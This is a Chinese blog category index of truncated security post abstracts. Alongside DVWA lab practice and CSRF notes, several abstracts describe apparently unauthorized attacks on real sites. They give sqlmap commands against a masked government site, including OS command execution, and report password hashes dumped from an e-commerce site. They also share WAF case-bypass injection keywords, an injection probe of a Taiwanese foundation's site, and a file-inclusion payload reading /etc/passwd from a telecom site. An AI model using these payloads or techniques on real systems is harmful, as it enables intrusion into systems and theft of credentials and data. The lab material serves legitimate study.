随笔分类 - 应用安全
摘要:这个事情其实很蛋疼,每天看到它在那弹…前几天看了几个教程,学会使用ollydbg,同时科普了下反汇编的知识,今天运用一下,学习怎么解决这个问题,也算是小试牛刀。先看看这个框框。对于这个框框实在深深的厌烦了。然后将它加载到ollydbg,对这个烦人的广告进行去除的动作。开始的时候一步步走,但是之前看教...
阅读全文
摘要:一些比较基础的东西,但是好多人包括面试都会问。今天在调试某个Web项目的时候,我仔细看了下。觉得有必要用心了解下。Accept:*/*Accept-Encoding:gzip,deflate,sdchAccept-Language:zh-CN,zh;q=0.8Cache-Control:max-age=0Connection:keep-aliveHost:localhostIf-Modified-Since:Sun, 26 Jan 2014 05:58:28 GMTIf-None-Match:"b06f50-60b3-4f0d947ae0900"Referer:http:/
阅读全文
摘要:今天在看某个电商站的时候,发现分站存在弱口令。。瞬间纠结了。。。database management system users password hashes: [*] blog [1]: password hash...
阅读全文
摘要:这东西真的很好用,今天好好的看了下。并且实践出真知,这东西的强大不是靠吹的。******************基本步骤***************sqlmap -u "http://news.hackworry.com/news?id=1" --current-user #获取当前用户名称sqlmap -u "http://news.hackworry.com/news?id=1" --current-db #获取当前数据库名称sqlmap -u "http://news.hackworry.com/news?id=1" --ta
阅读全文
摘要:这次渗透没有什么亮点,主要就是SQLMAP。这玩意很给力。直接给干掉了。。。 2005 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dbs --threads 10 2006 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --users --threads 10 2007 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-cmd="net user"
阅读全文
摘要:今天逛的时候发现的,就此转下:1、一个网站基本的安全措施有哪些?答:1)服务器管理权,包括服务器是否容易被被盗,服务器是否能让人随意插拔网线,服务器网关是否可以由别人随意控制 2)shell权限管理,如何登录服务器管理,必须本地登录,或者可以远程登录,或者通过vpn或者防火墙控制登录。 3)数据库管理,只允许本地登录,也允许远程登录,是否有ip限制。 4)网站软件运行的用户是否是root,能否随意读取服务器上的文件 5)代码中是否有sql注入,xss攻击的可能 6)OS是否有漏洞或者后门 7)DNS是否安全 8)是否有arp攻击2、一个网站的用户数据库被入侵的方式有哪些? 1)代码中有s...
阅读全文
摘要:用代理然后访问:http://www.tenable.com/products/nessus/nessus-homefeed
阅读全文
摘要:今天因为要搭建一个环境,无意之中发现一个BUG。当在设置主机名的时候,如果你输入错误的时候,默认的情况下会自动填充一些别的东西,例如后面的代码。具体情况如下:在12.04中发现该问题存在。= = # 怎么利用具体没细研究。。
阅读全文
摘要:今天遇到一个小红伞的WAF,随手测了下,发现很多都拦截了。但是任何WAF都不是万能的。对此,该WAF我发现了一个缺陷。例如在大小字符上没有做什么匹配策略。我可以很轻易的绕过去。虽然没法构造能够通过名单的select,但是其他的都绕过去了。把一些敏感的东西发出来,给有需要的人用。。SeLECt 一开始这个是能够绕过的。但是貌似UNION查询就不能使用。UnIon 这个没有被拦截。改下就能用。-1 和 -0 测试是否有注入, and 和 ‘ 这两个都被过滤了,不需要测试。OrDeR By 这个随时都能使用。没有做匹配策略。这是目前发现的绕过方法。Select这个敏感的我还想到方法,在后面有空的时候
阅读全文
摘要:仔细看了下dvwa里面的sql注入,对此加以分析,为什么会导致该问题。以下代码是安全性最低的,且看下:<?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid) or die('<pre>' . mysql_e
阅读全文
摘要:昨天看了下dvwa,并学习了下,就有了这篇文章。别干坏事,真被抓了就悲剧了.我只测试了下是否有这个漏洞.不敢深入...大致的看了下该网站,是台湾某个研究基金会的网站,看了下发现很多动态链接。随手测试了下看看是否有注入。发现居然转义了..既然’你转了,那我换个方法把。使用-0 -1判断下是否有问题。0的时候是正常的页面。-1 的时候却返回不同的页面,证明有问题。然后继续猜看能弄到神马。发现order by 注入的时候到15的时候报错了。然后直接就联合查询。看敏感信息了。剩下你懂得。查了下php的版本和当前用户到了这里就没有继续了。测试了下手工注入。
阅读全文
摘要:下载了dvwa,对SQL注入进行演练。使用了以下语句:写shell:http://192.168.0.106/dvwa/vulnerabilities/sqli_blind/?id='+union+select+2,'hello'+into+outfile+'/tmp/tt32.php'++--+&Submit=Submit#读取文件:http://192.168.0.106/dvwa/vulnerabilities/sqli_blind/?id='+union+select+2,load_file('/etc/passwd
阅读全文
摘要:某运营商....http://www.xxx.xx/customer/leaveMess.php?IDBaseLine=&cur_language=%2Fetc%2Fpasswd%00Warning: include(/etc/passwd\0.inc.php) [function.include]: failed to open stream: No such file or directory in /liusra2/xxx.xx/web/www/customer/language/language.inc.php on line 11Warning: include() [fun
阅读全文
摘要:这是当时一个面试题目,对此有点不太理解,技术更新太快了.今天看书的时候发现了这点,从理论上是背下来了,但是根本不理解其意思是什么.书上也很含糊的介绍了下,反正我没看明白到底什么意思.根据官方说法:跨站点请求伪造是通过伪装来自受信任用户的请求来利用受信用的网站,来蛊惑受害者进行一些敏感性的操作。简单的理解为:攻击者通过手工/工具检测发现该网站存在该隐患,精心构造一个连接,等待用户进行点击触发该问题,成功触发以后,根据用户的权限不同,来进行一些敏感的操作,例如删除文章/发表文章/改密码等等.解决方法:1.添加确认的操作. 2.加入验证码.再此记录下.每天进步一点...
阅读全文
摘要:实习以来,大部分工作是开发,但做为安全测试小组的一员,有必要了解安全测试、如何做安全黑盒测试和白盒测试、如何借助工具来测试。今 天做旺旺2010正式版(王挺已做完正在跟进的项目,已整理好风险点)测试。首先,查看风险点的UC,理解需求,进一步理解为什么这个点是风险点。通过前 段时间自己做开发,深刻体会到理解需求的重要性。做开发只有深刻理解了需求,才能做出符合客户的产品;做测试只有从客户的角度深刻理解了需求,才能发现产 品更多的缺陷。总之,客户的需求是根本所在。在理解了风险点之后,我正在为如何获取旺旺客户端的发送的请求和数据不知所措的时候,王挺给我介绍了两种抓包 工具——Fiddler和Wires
阅读全文

浙公网安备 33010602011771号